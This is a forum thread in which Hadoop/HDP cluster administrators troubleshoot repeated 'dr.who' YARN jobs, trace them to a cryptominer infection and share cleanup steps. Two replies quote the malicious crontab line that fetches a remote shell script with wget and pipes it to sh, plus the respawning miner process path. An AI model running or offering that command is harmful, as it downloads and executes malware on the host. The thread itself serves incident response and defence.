Created 05-02-2018 09:19 AM
We're running a HDP 2.5 cluster and today we noticed a series of dr.who "MYYARN" applications running, failing, and then resubmitting to YARN again and again. In what seems to be an "infinite loop". We can't figure out what the applications are doing and why they are failing. Any thoughts? Many thanks in advance!
Created 05-18-2018 09:43 PM
I experienced the problem on a new cluster, it was flooded with strange jobs from nowhere. In my case, the following was found in the crontab of 'yarn' user on each host:
*/2 * * * * wget -q -O - http://185.222.210.59/cr.sh | sh > /dev/null 2>&1
So, the suggestion is first to check 'sudo -u yarn crontab -l' (or maybe sudo -u dr.who). Still don't know, how it was infected.
Created 05-25-2018 08:36 PM
I ran into something like this recently on a POC cluster. The problem seen on this cluster was a "yarn" process was consuming 100% of cpu resources on multiple servers. We shutdown all of the HDP services via Ambari to make sure there wasn't any rogue HDP processes running. This "yarn" process was still running.
It turns out it was a process running this:
/var/tmp/java -c /var/tmp/w.conf
Killing the process with "kill -9" would kill the process off only for it to respawn a few seconds later. Removing the "/var/tmp/java" file also only worked for a few seconds before it too returned.
We ended up looking at crontab and found this:
$ sudo -u yarn crontab -e */2 * * * * wget -q -O - http://185.222.210.59/cr.sh | sh > /dev/null 2>&1
We removed the crontab entry, killed the running process and remove the java file on all nodes. The processes no longer returned and we restarted the HDP cluster via Ambari. The root cause appeared to be security group rules on AWS allowing access to the cluster.
I've seen variations of this reported out of /tmp/java and using "h.conf" instead of "w.conf".
Created 07-10-2018 03:19 PM
I solved this problem by change the owner and permission of dr.who path:
chown -R root:root /var/log/hadoop/yarn/local/usercache/dr.who
chmod -R 400 /var/log/hadoop/yarn/local/usercache/dr.who
or
chown -R root:root /hadoop/yarn/local/usercache/dr.who
chmod -R 400 /hadoop/yarn/local/usercache/dr.who
Now, the "NodeManagers" don't stop for this problem anymore.
Created 08-14-2018 10:47 AM
facing similiar issue where the shell script is being used to download and create cron
Created 08-14-2018 11:51 AM
@venu gopal Please refer this thread : https://community.hortonworks.com/questions/191898/hdp-261-virus-crytalminer-drwho.html